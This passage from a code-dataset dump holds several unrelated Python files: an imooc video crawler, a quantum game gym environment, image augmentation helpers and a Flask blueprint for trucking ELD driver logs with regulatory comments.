+ li\r\n        print(url)\r\n        fit3(url)\r\n\r\n\r\ndef fit3(url):\r\n    s = q(url, headers=headers)\r\n    r = s('div').filter('.page')\r\n    if r:\r\n        pages = re.findall(r'\\d', str(r.text()))\r\n        for page in pages:\r\n            urls = url + '&page=' + page\r\n            fit3_1(urls)\r\n    else:\r\n        fit3_1(url)\r\n\r\n\r\n\r\ndef fit2(url):\r\n    s = q(url, headers=headers)\r\n    r = s('div').filter('.chapter ')\r\n    name1 = s('h2').text()\r\n    for i in r:\r\n        a = q(i)\r\n        name2 = re.findall(r'第\\d.+?(?=&)',str(a))\r\n        link = a('a').filter('.J-media-item')\r\n        for i in link:\r\n            link = re.findall(r'(?<=video/).+?(?=\")', str(q(i)))\r\n            b = q(i).text()\r\n            name3 = re.findall(r'\\d-\\d.+(?=\\r)', str(b))\r\n            if link:\r\n                url = 'http://www.imooc.com/course/ajaxmediainfo/?mid=' + link[-1] + '&mode=flash'\r\n                r = requests.get(url)\r\n                r = r.json()\r\n                r = r['data']['result']['mpath']\r\n                H = r[-1]#BD\r\n                M = r[-2]#HD\r\n                L = r[-3]#SD\r\n                mkdr = '.\\\\' + name1 + '\\\\' + name2[-1]\r\n                if os.path.exists(mkdr)==False: \r\n                    os.makedirs(mkdr)\r\n                name = name1 + '\\\\' + name2[-1] + '\\\\' + name3[-1] + '.mp4'\r\n                thre.download( H, name, blocks=3, proxies={} )\r\n                \r\n\r\ndef fit1(url):\r\n    link = url.split('/', -1)[-1]\r\n    ul = 'http://www.imooc.com/course/ajaxmediainfo/?mid=' + link + '&mode=flash'\r\n    s = q(url, headers=headers)\r\n    r = s('em').text()\r\n    video = re.findall(r'\\d-.+?(?=\\d)', r)\r\n    name = video[-1] + '.mp4'\r\n    r = requests.get(ul)\r\n    r = r.json()\r\n    r = r['data']['result']['mpath']\r\n    H = r[-1]#BD\r\n    M = r[-2]#HD\r\n    L = r[-3]#SD\r\n    thre.download( H, name, blocks=4, proxies={} )\r\n\r\n\r\ndef ur(url):\r\n    if url =='http://www.imooc.com/':\r\n        print('fit4')\r\n        fit4(url)\r\n    elif url.split('/',-1)[-2] == 'video':\r\n        print('fit1')\r\n        fit1(url)\r\n    elif url.split('/',-1)[-2] == 'learn':\r\n        print('fit2')\r\n        fit2(url)\r\n    else:\r\n        print('fit3')\r\n        fit3(url)\r\n\r\nheaders = {'User-Agent':'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0'}\r\nprint('Please enter the link address: ',end=\"\")\r\nurl = input()\r\nur(url)\r\n\r\n", "repo_name": "somnusx/crawl-muke", "sub_path": "crawl muke.py", "file_name": "crawl muke.py", "file_ext": "py", "file_size_in_byte": 2928, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pyquery.PyQuery", "line_number": 9, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 12, "usage_type": "call"}, {"api_name": "pyquery.PyQuery", "line_number": 12, "usage_type": "call"}, {"api_name": "pyquery.PyQuery", "line_number": 19, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 21, "usage_type": "call"}, {"api_name": "pyquery.PyQuery", "line_number": 29, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 32, "usage_type": "call"}, {"api_name": "pyquery.PyQuery", "line_number": 42, "usage_type": "call"}, {"api_name": "pyquery.PyQuery", "line_number": 46, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 47, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 50, "usage_type": "call"}, {"api_name": "pyquery.PyQuery", "line_number": 50, "usage_type": "call"}, {"api_name": "pyquery.PyQuery", "line_number": 51, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 52, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "os.makedirs", 
"line_number": 63, "usage_type": "call"}, {"api_name": "thre.download", "line_number": 65, "usage_type": "call"}, {"api_name": "pyquery.PyQuery", "line_number": 71, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 73, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 75, "usage_type": "call"}, {"api_name": "thre.download", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "13898082749", "text": "import numpy as np\n\n# OpenAI gym\nimport gym\nfrom gym import spaces\n\n# Import fox-in-a-hole game\nfrom unitary.examples.fox_in_a_hole.fox_in_a_hole import *\n\nclass FoxHole(gym.Env):\n def __init__(self, num_holes, max_steps):\n super(FoxHole, self).__init__()\n\n # Define action and observation space\n # They must be gym.spaces objects\n self.num_holes = num_holes\n self.max_steps = max_steps\n\n # Possible actions\n self.action_space = spaces.Discrete(num_holes)\n self.observation_space = spaces.Box(low=np.zeros(max_steps), high=np.ones(max_steps), dtype=np.uint8)\n self.reset()\n\n def step(self, action):\n self.history[self.s] = action\n self.s += 1\n\n # Perform action\n done = self.game.check_guess(action)\n # Fox makes a move\n move_str = self.game.take_random_move()\n # Update observation\n observation = np.array(self.history) #self.game.get_probabilities()\n\n # Perhaps we won?\n reward = 1 if done else 0\n\n if self.s >= self.max_steps:\n done = True\n reward = 0\n\n info = {'move':'quantum' if move_str[0]==\"S\" else 'classical'}\n return observation, reward, done, info\n\n def reset(self):\n # Create a new game\n self.game = QuantumGame(iswap=True, hole_nr=self.num_holes)\n self.game.initialize_state()\n self.s = 0\n\n self.history = np.zeros(self.max_steps) #self.game.get_probabilities()\n return np.array(self.history)\n\n def render(self, mode='human'):\n print(\"Game History:\")\n for i in range(self.s):\n print(\"Move {0}: {1}\".format(i,self.history[i]))\n\n def close (self):\n return\n\nif __name__ == \"__main__\":\n # Test env\n env = FoxHole(5,10)\n\n env.reset()\n\n action = env.action_space.sample()\n obs, rewards, done, info = env.step(action)\n action = env.action_space.sample()\n obs, rewards, done, info = env.step(action)\n env.render()\n", "repo_name": "everthemore/FoxHole", "sub_path": "FoxHoleEnvironment.py", "file_name": "FoxHoleEnvironment.py", "file_ext": "py", "file_size_in_byte": 2009, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "gym.Env", "line_number": 10, "usage_type": "attribute"}, {"api_name": "gym.spaces.Discrete", "line_number": 20, "usage_type": "call"}, {"api_name": "gym.spaces", "line_number": 20, "usage_type": "name"}, {"api_name": "gym.spaces.Box", "line_number": 21, "usage_type": "call"}, {"api_name": "gym.spaces", "line_number": 21, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 21, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "72042263844", "text": "import random\nimport PIL.Image as Image\nfrom PIL import ImageEnhance\n\ndef get_patch_low_light(low_light, ground_truth, patch_size):\n #수정해야함\n height, width = low_light.size[1], low_light.size[0]\n\n ix = 
random.randrange(0, width - patch_size + 1)\n    iy = random.randrange(0, height - patch_size + 1)\n\n    # horizontal start, vertical start, horizontal range, vertical range\n    crop_area = (ix, iy, ix + patch_size, iy + patch_size)\n\n    low_light_img = low_light.crop(crop_area)\n    ground_truth_img = ground_truth.crop(crop_area)\n\n    return low_light_img, ground_truth_img\n\ndef get_patch_low_light_global(low_light, ground_truth, patch_size):\n    # needs revision\n    height, width = low_light.size[1], low_light.size[0]\n\n    ix = random.randrange(0, width - patch_size + 1)\n    iy = random.randrange(0, height - patch_size + 1)\n\n    # horizontal start, vertical start, horizontal range, vertical range\n    crop_area = (ix, iy, ix + patch_size, iy + patch_size)\n    select_num = random.randint(1,2)\n    if select_num == 1:\n        low_light_img = low_light.crop(crop_area)\n        ground_truth_img = ground_truth.crop(crop_area)\n    else :\n        illumination = random.randint(1,10) * 0.1\n        low_light_img = ground_truth.crop(crop_area)\n        global_illumination_Image = ImageEnhance.Brightness(low_light_img)\n        low_light_img = global_illumination_Image.enhance(illumination)\n        ground_truth_img = ground_truth.crop(crop_area)\n\n    return low_light_img, ground_truth_img\n\n\ndef augmentation_low_light(low_light, ground_truth, args):\n    rotate = args.augment_rotate == 0 and random.random() < 0.5\n    augment_T2B = args.augment_T2B == 0 and random.random() < 0.5\n    augment_L2R = args.augment_L2R == 0 and random.random() < 0.5\n\n    if rotate :\n        i = random.randint(0, 3) # random integer between 0 and 3\n        rotate_list = [90,180,-90,-180]\n        low_light = low_light.rotate(rotate_list[i])\n        ground_truth = ground_truth.rotate(rotate_list[i])\n\n\n    if augment_T2B:\n        low_light = low_light.transpose(Image.FLIP_TOP_BOTTOM)\n        ground_truth = ground_truth.transpose(Image.FLIP_TOP_BOTTOM)\n\n    if augment_L2R:\n        low_light = low_light.transpose(Image.FLIP_LEFT_RIGHT)\n        ground_truth = ground_truth.transpose(Image.FLIP_LEFT_RIGHT)\n\n    return low_light, ground_truth\n\ndef get_patch_sr(low_light_image, low_light_ground_truth_image, hr_image, patch_size, scale):\n\n    hr_height, hr_width = hr_image.size[1], hr_image.size[0]\n    lr_height, lr_width = low_light_image.size[1], low_light_image.size[0]\n\n    hr_patch_size = (int)(scale * patch_size) # 128\n    lr_patch_size = patch_size\n\n    lr_x = random.randrange(0, lr_width - lr_patch_size + 1)\n    lr_y = random.randrange(0, lr_height - lr_patch_size + 1)\n\n    hr_x = lr_x * scale\n    hr_y = lr_y * scale\n\n    target_hr_x = random.randrange(0, hr_width - hr_patch_size + 1)\n    target_hr_y = random.randrange(0, hr_height - hr_patch_size + 1)\n\n    lr_crop_area = (lr_x, lr_y, lr_x+lr_patch_size, lr_y+lr_patch_size)\n    hr_crop_area = (hr_x, hr_y, hr_x+hr_patch_size, hr_y+hr_patch_size)\n    target_hr_crop_area = (target_hr_x, target_hr_y, target_hr_x + hr_patch_size, target_hr_y + hr_patch_size)\n\n    lr_patch = low_light_image.crop(lr_crop_area)\n    lr_gt_patch = low_light_ground_truth_image.crop(lr_crop_area)\n    hr_patch = hr_image.crop(hr_crop_area)\n    # lr_patch = hr_patch.resize((patch_size, patch_size), Image.BICUBIC)\n    hr_target_patch = hr_image.crop(target_hr_crop_area)\n\n    return lr_patch, lr_gt_patch, hr_patch, hr_target_patch\n\ndef augmentation_sr(lr_patch, lr_gt_patch, hr_patch, hr_target_patch, args):\n    rotate = args.augment_rotate == 0 and random.random() < 0.5\n    augment_T2B = args.augment_T2B == 0 and random.random() < 0.5\n    augment_L2R = args.augment_L2R == 0 and random.random() < 0.5\n\n    if rotate :\n        i = random.randint(0, 3) # random integer between 0 and 3\n        rotate_list = [90,180,-90,-180]\n        lr_patch = lr_patch.rotate(rotate_list[i])\n        lr_gt_patch = 
lr_gt_patch.rotate(rotate_list[i])\n hr_patch = hr_patch.rotate(rotate_list[i])\n hr_target_patch = hr_target_patch.rotate(rotate_list[i])\n\n\n if augment_T2B:\n lr_patch = lr_patch.transpose(Image.FLIP_TOP_BOTTOM)\n lr_gt_patch = lr_gt_patch.transpose(Image.FLIP_TOP_BOTTOM)\n hr_patch = hr_patch.transpose(Image.FLIP_TOP_BOTTOM)\n hr_target_patch = hr_target_patch.transpose(Image.FLIP_TOP_BOTTOM)\n\n if augment_L2R:\n lr_patch = lr_patch.transpose(Image.FLIP_LEFT_RIGHT)\n lr_gt_patch = lr_gt_patch.transpose(Image.FLIP_LEFT_RIGHT)\n hr_patch = hr_patch.transpose(Image.FLIP_LEFT_RIGHT)\n hr_target_patch = hr_target_patch.transpose(Image.FLIP_LEFT_RIGHT)\n\n return lr_patch, lr_gt_patch, hr_patch, hr_target_patch", "repo_name": "dokyeongK/DALE", "sub_path": "data/dataset_utils.py", "file_name": "dataset_utils.py", "file_ext": "py", "file_size_in_byte": 4840, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 26, "dataset": "github-code", "pt": "52", "api": [{"api_name": "random.randrange", "line_number": 9, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 10, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 24, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 25, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 29, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 34, "usage_type": "call"}, {"api_name": "PIL.ImageEnhance.Brightness", "line_number": 36, "usage_type": "call"}, {"api_name": "PIL.ImageEnhance", "line_number": 36, "usage_type": "name"}, {"api_name": "random.random", "line_number": 44, "usage_type": "call"}, {"api_name": "random.random", "line_number": 45, "usage_type": "call"}, {"api_name": "random.random", "line_number": 46, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 49, "usage_type": "call"}, {"api_name": "PIL.Image.FLIP_TOP_BOTTOM", "line_number": 56, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 56, "usage_type": "name"}, {"api_name": "PIL.Image.FLIP_TOP_BOTTOM", "line_number": 57, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 57, "usage_type": "name"}, {"api_name": "PIL.Image.FLIP_LEFT_RIGHT", "line_number": 60, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 60, "usage_type": "name"}, {"api_name": "PIL.Image.FLIP_LEFT_RIGHT", "line_number": 61, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 61, "usage_type": "name"}, {"api_name": "random.randrange", "line_number": 73, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 74, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 79, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 80, "usage_type": "call"}, {"api_name": "random.random", "line_number": 95, "usage_type": "call"}, {"api_name": "random.random", "line_number": 96, "usage_type": "call"}, {"api_name": "random.random", "line_number": 97, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 100, "usage_type": "call"}, {"api_name": "PIL.Image.FLIP_TOP_BOTTOM", "line_number": 109, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 109, "usage_type": "name"}, {"api_name": "PIL.Image.FLIP_TOP_BOTTOM", "line_number": 110, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 110, "usage_type": "name"}, {"api_name": "PIL.Image.FLIP_TOP_BOTTOM", "line_number": 111, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 111, 
"usage_type": "name"}, {"api_name": "PIL.Image.FLIP_TOP_BOTTOM", "line_number": 112, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 112, "usage_type": "name"}, {"api_name": "PIL.Image.FLIP_LEFT_RIGHT", "line_number": 115, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 115, "usage_type": "name"}, {"api_name": "PIL.Image.FLIP_LEFT_RIGHT", "line_number": 116, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 116, "usage_type": "name"}, {"api_name": "PIL.Image.FLIP_LEFT_RIGHT", "line_number": 117, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 117, "usage_type": "name"}, {"api_name": "PIL.Image.FLIP_LEFT_RIGHT", "line_number": 118, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 118, "usage_type": "name"}]} +{"seq_id": "32719329395", "text": "from flask import Blueprint, render_template, redirect, url_for, abort, request, jsonify\nfrom flask.ext.login import login_required, current_user\nfrom flask.ext.principal import Permission, UserNeed\nfrom webapp1.extensions import poster_permission, admin_permission\nfrom webapp1.forms import DriverForm, ElogForm, EmailServicesForm, BluetoothServicesForm, USBServicesForm, \\\n WIFIservicesForm, CertifyForm\nfrom webapp1.models import drivers, db, RPM, User, Events\nimport datetime\nfrom sqlalchemy import update\nimport random\n\nlogs_blueprint = Blueprint(\n 'logs',\n __name__,\n template_folder='../templates/logs',\n url_prefix=\"/logs\"\n)\n\n\n##OBD simulator\n#Simulates J1939 data feeding this truck:\n#Send request for RPM\n#Receives data triggers all the events...\n#Updates Events Table\n#newevents = Events()\n#db.session.add(Events)\n#try:\n# db.session.commit()\n#except Exception as e:\n# db.session.rollback\n\n\n\n@logs_blueprint.route('/certify', methods=['GET', 'POST'])\ndef certifylogs():\n certify = CertifyForm(request.form)\n return render_template('certifylogs.html', role = 1, certify = certify)\n\n\n@logs_blueprint.route('/certifylogsaccept', methods=['GET', 'POST'])\ndef certifylogscomplete():\n certify = CertifyForm(request.form)\n data =str(datetime.datetime.today().day) + \"\" + str(datetime.datetime.today().month) + \"\" + str(datetime.datetime.today().year)\n thisdate_ = int(data)\n previousmax = db.engine.execute('select max(\"Event_Code\") from events where events.todays_log = %s and user_id = %s',[int(data), current_user.get_id()])\n\n try:\n for i in previousmax:\n data = i\n data = data[0]\n if(int(data) > 8):\n eventrecord = 9\n else:\n eventrecord = data + 1\n except Exception as e:\n eventrecord = 1\n event = Events(Event_Record_Status = 1, Event_Record_Origin = 2, Event_Type = 4, Event_Code = int(eventrecord), Event_Date = datetime.datetime.now(), Event_Time = datetime.datetime.now(), user_id = current_user.get_id(), todays_log = thisdate_)\n db.session.add(event)\n db.session.commit() \n #form = DriverForm(request.form)\n return render_template('certifylogs.html', role = 1, certify = certify)\n\n\n@logs_blueprint.route('/gasoline', methods=['GET', 'POST'])\ndef gasoline():\n elog = ElogForm(request.form)\n form = DriverForm(request.form)\n try:\n firstname = request.form.get('firstname')\n lastname = request.form.get('lastname')\n driverslicense = request.form.get('driverslicense')\n driverslicensestate = request.form.get('driverslicensestate')\n driver = drivers(firstname, lastname, driverslicense, driverslicensestate)\n db.session.add(driver)\n except Exception as e:\n print(e)\n db.session.rollback()\n if not 
current_user.is_authenticated:\n return redirect(url_for('admin.login_view'))\n return render_template('gasoline.html', form=form, elog=elog, role = 2)\n\n\n@logs_blueprint.route('/roadside', methods=['GET', 'POST'])\ndef logs():\n # This is going to return a list of dictionaries that will generate the table in the logs.html template\n # It will start with some sort of query that will iterate over the results and encode them into the list of dictionaries.\n # For example\n counter = 0\n list_ = []\n for i in range(0, 96):\n list__ = []\n counter = counter + .25\n list__.append(counter)\n list__.append(random.randint(1, 4))\n list_.append(list__)\n\n date = request.form.get('datefrom')\n\n elog = ElogForm(request.form)\n form = DriverForm(request.form)\n try:\n date = request.form.get('datefrom')\n except Exception as e:\n date = \"2017-11-27\"\n # date = \"2017-03-03\"\n # Injecting to test this new filtering events method\n try:\n data = date.split('/')\n except Exception as e:\n date = str(datetime.datetime.today().month) + \"/\" + str(datetime.datetime.today().day) + \"/\" + str(\n datetime.datetime.today().year)\n data = date.split('/')\n date = str(datetime.datetime.today().month) + \"-\" + str(datetime.datetime.today().day) + \"-\" + str(\n datetime.datetime.today().year)\n\n dateforfiltering = str(date).split(\"-\")\n dateforfiltering = str(dateforfiltering[2]) + \"\" + str(dateforfiltering[1]) + \"\" + str(dateforfiltering[0])\n date_to_redirect_to_edit = str(dateforfiltering[2]) + \"-\" + str(dateforfiltering[1]) + \"-\" + str(\n dateforfiltering[0])\n thisdata_ = Events.query.filter_by(todays_log=int(dateforfiltering)).all()\n newlist_ = []\n for i in thisdata_:\n # (str(i).split(\",\")\n newlist_.append(str(i).split(\",\"))\n\n # Google Charts working code for logs\n stateinitial = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 1, 2, 3, 4, 5, 6, 7, 8, 8]\n reportinglist = []\n for i in range(0, len(newlist_)):\n # if(int(rows[1][0]) > 499):\n newdata = []\n try:\n newdata.append(int(i))\n newdata.append(int(newlist_[i][6]))\n\n reportinglist.append(newdata)\n except Exception as e:\n print(e)\n current_status = 'driving'\n if not current_user.is_authenticated:\n return redirect(url_for('admin.login_view'))\n\n return render_template('logs.html', form=form, elog=elog, role=1, current_status=current_status,\n events_log=newlist_, logdata=reportinglist, thiddate_=dateforfiltering,\n date_to_redirect_to_edit=date_to_redirect_to_edit)\n\n\n\n\n@logs_blueprint.route('/showlogs', methods=['GET', 'POST'])\ndef logs1():\n #This is going to return a list of dictionaries that will generate the table in the logs.html template\n #It will start with some sort of query that will iterate over the results and encode them into the list of dictionaries.\n # For example\n _driver_ = request.args.get(\"driverid\")\n counter = 0\n list_ = []\n for i in range(0,96):\n list__ = []\n counter = counter + .25\n list__.append(counter)\n list__.append(random.randint(1,4))\n list_.append(list__)\n \n date = request.form.get('datefrom')\n elog = ElogForm(request.form)\n form = DriverForm(request.form)\n try:\n date = request.form.get('datefrom')\n date = 2932018\n except Exception as e:\n date = \"2017-11-27\"\n # date = \"2017-03-03\"\n #Injecting to test this new filtering events method\n try:\n data = date.split('/')\n except Exception as e:\n date = str(datetime.datetime.today().month) + \"/\" + str(datetime.datetime.today().day) + \"/\" + str(datetime.datetime.today().year)\n data = date.split('/')\n date = 
str(datetime.datetime.today().month) + \"-\" + str(datetime.datetime.today().day) + \"-\" + str(datetime.datetime.today().year)\n\n\n dateforfiltering = str(date).split(\"-\")\n dateforfiltering = str(dateforfiltering[2]) + \"\" + str(dateforfiltering[1]) + \"\" + str(dateforfiltering[0])\n date_to_redirect_to_edit = str(dateforfiltering[2]) + \"-\" + str(dateforfiltering[1]) + \"-\" + str(dateforfiltering[0])\n thisdata_ = Events.query.filter_by(todays_log=int('3032018')).all()\n newlist_ = []\n for i in thisdata_:\n #(str(i).split(\",\")\n newlist_.append(str(i).split(\",\"))\n\n\n #Google Charts working code for logs\n stateinitial = [0,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,8]\n reportinglist = []\n for i in range(0,len(newlist_)):\n # if(int(rows[1][0]) > 499):\n newdata = []\n try:\n newdata.append(int(i))\n newdata.append(int(newlist_[i][6]))\n\n reportinglist.append(newdata)\n except Exception as e:\n print(e)\n current_status = 'driving'\n # if not current_user.is_authenticated:\n # return redirect(url_for('admin.login_view'))\n _date_ = request.args.get(\"log_date\")\n #if len(str(_date_)) < 1:\n _data_ = '2932018'\n event_log = Events.query.filter_by(todays_log=int('2932018')).all()\n return render_template('logs.html', form=form, elog=elog, role = 2, current_status = current_status, events_log = event_log, logdata = reportinglist, thiddate_ = dateforfiltering, date_to_redirect_to_edit = date_to_redirect_to_edit)\n\n\n@logs_blueprint.route('/showlogs_driver', methods=['GET', 'POST'])\ndef logs_driver():\n date = request.form.get('datefrom')\n elog = ElogForm(request.form)\n form = DriverForm(request.form)\n try:\n date = request.form.get('datefrom')\n except Exception as e:\n date = \"2017-03-03\"\n # date = \"2017-03-03\"\n print(date)\n todayslog___ = date.split(\"-\")\n todayslog___ = str(todayslog___[2]) + \"\" + str(todayslog___[1]) + \"\" + str(todayslog___[0])\n # date = \"2017-03-03\"\n data = Events.query.filter_by(todays_log=todayslog___).all()\n\n # data = RPM.query.filter_by(user_id=current_user.get_id(), daterecorded=date).all()\n # print(data)\n stateinitial = []\n for i in data:\n stateinitial.append(int(i.rpm))\n\n timestate = []\n state = []\n counter = 1\n newlist = []\n\n for i in range(0, len(stateinitial)):\n # if(int(rows[1][0]) > 499):\n newval = random.randint(450, 600)\n\n if (stateinitial[i] > 499):\n state.append(1)\n timestate.append(counter)\n else:\n state.append(0)\n timestate.append(counter)\n counter += 1\n\n for i in range(1, len(state)):\n try:\n if (state[i] != state[i + 1]):\n newlist.append(i + 1)\n except Exception as e:\n print(e)\n counter = 0\n for i in newlist:\n if (state[i + counter] == 1):\n state.insert(i + counter, 1)\n timestate.insert(i + counter, i)\n else:\n state.insert(i + counter, 0)\n timestate.insert(i + counter, i)\n counter += 1\n data = state\n xdata = timestate\n\n # if not current_user.is_authenticated:\n # return redirect(url_for('admin.login_view'))\n return render_template('logs.html', form=form, elog=elog, xdata=xdata, data=data, datedata=date, role = 2)\n\n\n# AJAX\n@logs_blueprint.route('/DRIVING', methods=['GET'])\ndef driving():\n a = request.args.get('a', 0, type=int)\n b = request.args.get('b', 0, type=int)\n print(\"Driving\")\n if(datetime.datetime.today().day) < 10:\n today_ = \"0\" + str(datetime.datetime.today().day)\n else:\n today_ = str(datetime.datetime.today().day)\n todaysdate_ = str(today_) + \"\" + str(datetime.datetime.today().month) + \"\" + str(datetime.datetime.today().year)\n 
db.engine.execute('update drivers set \"Current_Status\" = %s where user_id = %s', [1, current_user.get_id()])\n db.session.commit()\n event = Events(Event_Record_Status = 1, Event_Record_Origin = 2, Event_Type = 1, Event_Code = 3, Event_Date = datetime.datetime.now(), Event_Time = datetime.datetime.now(), todays_log = todaysdate_)\n db.session.add(event)\n db.session.commit() \n #db.engine.execute('update drivers set \"Current_Status\" = %s where user_id = %s', [1, 1])\n return jsonify(result=\"Driving\")\n\n # id = Column(Integer, primary_key = True, autoincrement = True)\n # #Type 1\n # Event_Sequence_ID_Number = Column(Integer)\n # # Description : This data element refers to the serial identifier assigned to each required\n # ELD event as described in section 4.5.1 of this appendix.\n # Purpose : Provides ability to keep a continuous record, on a given ELD, across all\n # users of that ELD.\n # Source : ELD internal calculations.\n # Used in : ELD event records; ELD outputs.\n # Data Type : ELD maintained; incremented by 1 for each new record on the ELD;\n # continuous for each new event the ELD records regardless of owner of the records.\n # Data Range : 0 to FFFF; initial factory value must be 0; after FFFF hexadecimal\n # (decimal 65535), the next Event Sequence ID number must be 0. \n # 148\n # Data Length : 1-4 characters.\n # Data Format : <Event Sequence ID Number > as in <C> to <CCCC>.\n # Disposition : Mandatory.\n # Examples : [1], [1F2C], [2D3], [BB], [FFFE]. \n # Event_Sequence_ID_Number = Column(Integer)\n # Event_Record_Status = Column(Integer)\n # Event_Record_Origin = Column(Integer)\n # Event_Type = Column(Integer)\n # Event_Code = Column(Integer) \n\n # 7.23 Event Record Status\n # Description : An attribute for the event record indicating whether an event is active or\n # inactive and further, if inactive, whether it is due to a change or lack of confirmation by\n # the driver or due to a driver’s rejection of change request.\n # Purpose : Provides ability to keep track of edits and entries performed over\n # ELD records while retaining original records.\n # Source : ELD internal calculations.\n # Used in : ELD event records; ELD outputs.\n # Data Type : ELD recorded and maintained event attribute in accordance with the\n # procedures outlined in sections 4.4.4.2.2, 4.4.4.2.3, 4.4.4.2.4, 4.4.4.2.5, and 4.4.4.2.6 of\n # this appendix.\n # Data Range : 1, 2, 3 or 4 as described on Table 8 of this appendix. \n # 147\n # Data Length : 1 character.\n # Data Format : <Event Record Status> as in <C>.\n # Disposition : Mandatory.\n # Examples : [1], [2], [3], [4] \n\n\n # Event_Record_Origin = Column(Integer)\n # Description : An attribute for the event record indicating whether it is automatically\n # recorded, or edited, entered or accepted by the driver, requested by another authenticated\n # user, or assumed from unidentified driver profile.\n # Purpose : Provides ability to track origin of the records.\n # Source : ELD internal calculations.\n # Used in : ELD event records; ELD outputs.\n # Data Type : ELD recorded and maintained event attribute in accordance with the\n # procedures outlined in sections 4.4.4.2.2, 4.4.4.2.3, 4.4.4.2.4, 4.4.4.2.5, and 4.4.4.2.6 of\n # this appendix.\n # Data Range : 1, 2, 3 or 4 as described on Table 7 of this appendix.\n # Data Length : 1 character.\n # Data Format : <Event Record Origin> as in <C>.\n # Disposition : Mandatory. \n # 146\n # Examples : [1], [2], [3], [4]. 
\n\n    # Event_Type = Column(Integer)\n    # Description : An attribute specifying the type of the event record.\n    # Purpose : Provides ability to code the type of the recorded event in electronic\n    # format.\n    # Source : ELD internal calculations.\n    # Used in : ELD event records; ELD outputs.\n    # Data Type : ELD recorded and maintained event attribute in accordance with the type\n    # of event being recorded.\n    # Data Range : 1-7 as described on Table 9 of this appendix.\n    # Data Length : 1 character.\n    # Data Format : <Event Type> as in <C>.\n    # Disposition : Mandatory.\n    # Examples : [1], [5], [4], [7].\n    # Table 9\n    # “Event Type” Parameter Coding\n    # Event Type Event Type Code\n    # A change in driver’s duty-status 1\n    # An intermediate log 2 \n    # 149\n    # A change in driver’s indication of authorized personal use of\n    # CMV or yard moves\n    # 3\n    # A driver’s certification/re-certification of records 4\n    # A driver’s login/logout activity 5\n    # CMV’s engine power up / shut down activity 6\n    # A malfunction or data diagnostic detection occurrence 7 \n\n\n    # Event_Code = Column(Integer)\n    # Description : A dependent attribute on “Event Type” parameter that further specifies\n    # the nature of the change indicated in “Event Type”; this parameter indicates the new\n    # status after the change.\n    # Purpose : Provides ability to code the specific nature of the change electronically.\n    # Source : ELD internal calculations.\n    # Used in : ELD event records; ELD outputs.\n    # Data Type : ELD recorded and maintained event attribute in accordance with the type\n    # of event and nature of the new status being recorded.\n    # Data Range : Dependent on the “Event Type” as indicated on Table 6 of this appendix.\n    # Data Length : 1 character.\n    # Data Format : <Event Type> as in <C>.\n    # Disposition : Mandatory.\n    # Examples : [0], [1], [4], [9]. \n\n\n    # Event_Date = Column(Date)\n    # Event_Time = Column(Time)\n    # Accumulated_Engine_Miles = Column(Integer)\n    # Elapsed_Engine_Hours = Column(Integer)\n    # Description : This data element refers to the time the CMV’s engine is powered in\n    # decimal hours with 0.1 hr (6-minute) resolution; this parameter is a placeholder for\n    # <{Total} Engine Hours>, which refers to the aggregated time of a vehicle’s engine’s\n    # operation since its inception, and used in recording “engine power on” and “engine shut\n    # down” events, and also for <{Elapsed} Engine Hours>, which refers to the elapsed time\n    # in the engine’s operation in the given ignition power on cycle, and used in the recording\n    # of all other events.\n    # Purpose : Provides ability to identify gaps in the operation of a CMV, when the\n    # vehicle’s engine may be powered but the ELD may not; provides ability to cross check\n    # integrity of recorded data elements in events and prevent gaps in the recording of ELD.\n    # Source : ELD measurement or sensing.\n    # Used in : ELD events; ELD outputs.\n    # Data Type : Acquired from the engine ECM or a comparable other source as allowed\n    # in section 4.3.1.4.\n    # Data Range : For <{Total} Engine Hours>, range is between 0.0 and 99,999.9; for\n    # <{Elapsed} Engine Hours>, range is between 0.0 and 